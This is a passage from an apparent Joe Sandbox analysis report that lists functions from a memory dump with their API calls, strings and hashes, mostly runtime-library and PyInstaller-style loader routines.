                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: -$:$f$p$p
                                                                                        • API String ID: 3215553584-2013873522
                                                                                        • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                        • Instruction ID: 185b8e073571c2a14cb72edb5298ba3c382f4b2300b7a415851c7b6c7138ea9a
                                                                                        • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                        • Instruction Fuzzy Hash: 6612B362E0C243A6FB207E16F16427AF651FB48772FD49075E689476C4DB3CED948B20
                                                                                        Function 00007FF7CA7A02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID: f$f$p$p$f
                                                                                        • API String ID: 3215553584-1325933183
                                                                                        • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                        • Instruction ID: 9729fdf35d9b8f656d733ac7177f68536e39b046f9d3c7d0175419ed0c409069
                                                                                        • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                        • Instruction Fuzzy Hash: 6B129722E0C143A6FB607E16F0786B9F251FB84766FC45875E689466C4DF3CEC828B64
                                                                                        Function 00007FF7CA791050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                        • API String ID: 2030045667-3659356012
                                                                                        • Opcode ID: 307eab48624233609503fb27858423c19ddbb3df3d9c7fa52bd05a06e8c331e4
                                                                                        • Instruction ID: 046e6b8dfbe1b476ce11b18dcc59facd59fff3d49f15ec2a8e9a86414fe738cd
                                                                                        • Opcode Fuzzy Hash: 307eab48624233609503fb27858423c19ddbb3df3d9c7fa52bd05a06e8c331e4
                                                                                        • Instruction Fuzzy Hash: 98419261B4864251FA50BF37B8609B6E391BB58BE6FC440B2DD1D07B95DF3CE4158350
                                                                                        Function 00007FF7CA791440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                        • API String ID: 2030045667-3659356012
                                                                                        • Opcode ID: 94936c7862b543b9ad9b9c04eb1d0524d04a0463598d2a78f1e4fedd13304a2f
                                                                                        • Instruction ID: a0eb16912b932c42a1d9baf0563eb8dcd5e61943c4c21d96487518526caeb14a
                                                                                        • Opcode Fuzzy Hash: 94936c7862b543b9ad9b9c04eb1d0524d04a0463598d2a78f1e4fedd13304a2f
                                                                                        • Instruction Fuzzy Hash: C7418E61B0864281FA60BF37B4619BAE3A0FB5C7E6FD44072DE4E07A95EE3CE5418710
                                                                                        Function 00007FF7CA79DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                        • String ID: csm$csm$csm
                                                                                        • API String ID: 849930591-393685449
                                                                                        • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                        • Instruction ID: 1925f6e7017e78e0b43f54eb533ee5ff043b008a596f0a969bcec1978b100ddf
                                                                                        • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                        • Instruction Fuzzy Hash: 3CD19132A0874186FB20AF76E4517ADB7A0FB587AAF900176EE4D57796DF38E480C710
                                                                                        Function 00007FF7CA79CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D06D
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D07B
                                                                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D0A5
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D113
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7CA79D29A,?,?,?,00007FF7CA79CF8C,?,?,?,00007FF7CA79CB89), ref: 00007FF7CA79D11F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                        • String ID: api-ms-
                                                                                        • API String ID: 2559590344-2084034818
                                                                                        • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                        • Instruction ID: 0118371054b136b923ac20cc59fc5901ea0ad48df6ba7f1a83973a246ef4d33c
                                                                                        • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                        • Instruction Fuzzy Hash: 5931B461A1AB4285FE11AF3BB520A75A394BF4CB76F990576DD1D07391EF3CE4428320
                                                                                        Function 00007FF7CA7AA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        • Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                        • Instruction ID: 0314e74cc5f95f78e9c49c88b710fc0b5e1f18f0eb6b879f71166abd8444de39
                                                                                        • Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
                                                                                        • Instruction Fuzzy Hash: 9B219D20A0C64662FA65BF277665178E1527F4C7B2F9426B4E83E07AD6DE2CAC004720
                                                                                        Function 00007FF7CA7B707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                        • String ID: CONOUT$
                                                                                        • API String ID: 3230265001-3130406586
                                                                                        • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                        • Instruction ID: f86253c2b65eb7a1b658cc356d3a13d7cf5fda6afa7b7a5a195bda1a9b4315be
                                                                                        • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                        • Instruction Fuzzy Hash: DD117F61A18B4586F760AF03B864729A2A4BB9CBF5F904274EE1D877A4DF3CD4048750
                                                                                        Function 00007FF7CA7981F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA79821D
                                                                                        • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA79827A
                                                                                          • Part of subcall function 00007FF7CA7986B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7CA793FA4,00000000,00007FF7CA791925), ref: 00007FF7CA7986E9
                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA798305
                                                                                        • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA798364
                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA798375
                                                                                        • FreeLibrary.KERNEL32(?,00000000,?,00007FF7CA7939F2), ref: 00007FF7CA79838A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 3462794448-0
                                                                                        • Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                        • Instruction ID: b80aa7439ca25f78f7b8e0553ee0647e961ae5b716fc38f6ff84b748aaf1a4ee
                                                                                        • Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
                                                                                        • Instruction Fuzzy Hash: AE41A362A1968281FA30AF33B424ABEB398FB88BA1F844176DF5C57785DE3CD401C710
                                                                                        Function 00007FF7CA7AA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A,?,?,?,?,00007FF7CA7A649F), ref: 00007FF7CA7AA5E7
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A,?,?,?,?,00007FF7CA7A649F), ref: 00007FF7CA7AA61D
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A,?,?,?,?,00007FF7CA7A649F), ref: 00007FF7CA7AA64A
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A,?,?,?,?,00007FF7CA7A649F), ref: 00007FF7CA7AA65B
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A,?,?,?,?,00007FF7CA7A649F), ref: 00007FF7CA7AA66C
                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7CA7A43FD,?,?,?,?,00007FF7CA7A979A,?,?,?,?,00007FF7CA7A649F), ref: 00007FF7CA7AA687
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$ErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 2506987500-0
                                                                                        • Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                        • Instruction ID: 5d77c655523dddd8586e90b104688b61fb5d3278ec2988c3befdb2e66f7dfe03
                                                                                        • Opcode Fuzzy Hash: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
                                                                                        • Instruction Fuzzy Hash: F5118B20A0828662FE54BF237670138E2527F8D7B2F9463B4D83E076D6DE2CAC004B21
                                                                                        Function 00007FF7CA792300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                        • String ID: Unhandled exception in script
                                                                                        • API String ID: 3081866767-2699770090
                                                                                        • Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                        • Instruction ID: 212bd4a2b353b85c56b0cc94476a372b3865c2bf3c5935bd9096bb9bc884cbf4
                                                                                        • Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
                                                                                        • Instruction Fuzzy Hash: B7316C72609A8289FB20AF62F8656F9A360FB8C7A5F800076EE4D47B55DF3CD5008710
                                                                                        Function 00007FF7CA792760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ByteCharMultiWide
                                                                                        • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                        • API String ID: 1878133881-640379615
                                                                                        • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                        • Instruction ID: 95f9bd363c724dbb789ab6f5602f14869ae8d02f96b89d7cb24c79b28771fa51
                                                                                        • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                        • Instruction Fuzzy Hash: DE21947262878591F620EF21F461BEAA364FF88795FC01076EA8D03A99DF3CD645C750
                                                                                        Function 00007FF7CA7A8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                        • API String ID: 4061214504-1276376045
                                                                                        • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                        • Instruction ID: 11f1b31100eddaf92d395bd8bee3a8878fc4952c83ed6e0440bfc59dd8a9c3d0
                                                                                        • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                        • Instruction Fuzzy Hash: 3EF0A46160870281FA106F26B4687799360BF9D776FC406B5CD6D461F4CF3CD849C320
                                                                                        Function 00007FF7CA7B8678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _set_statfp
                                                                                        • String ID:
                                                                                        • API String ID: 1156100317-0
                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                        • Instruction ID: e3884f16d3664c60c20099bd679695896b6fe2dc4e2231c999fcb16b5720ec65
                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                        • Instruction Fuzzy Hash: CF116DA2E68B0201F6543F6AF87E37592407F7C37AF9506B5ED7E066D68E2CA8418130
                                                                                        Function 00007FF7CA7AA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7CA7A98B3,?,?,00000000,00007FF7CA7A9B4E,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7AA6BF
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A98B3,?,?,00000000,00007FF7CA7A9B4E,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7AA6DE
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A98B3,?,?,00000000,00007FF7CA7A9B4E,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7AA706
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A98B3,?,?,00000000,00007FF7CA7A9B4E,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7AA717
                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7CA7A98B3,?,?,00000000,00007FF7CA7A9B4E,?,?,?,?,?,00007FF7CA7A9ADA), ref: 00007FF7CA7AA728
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
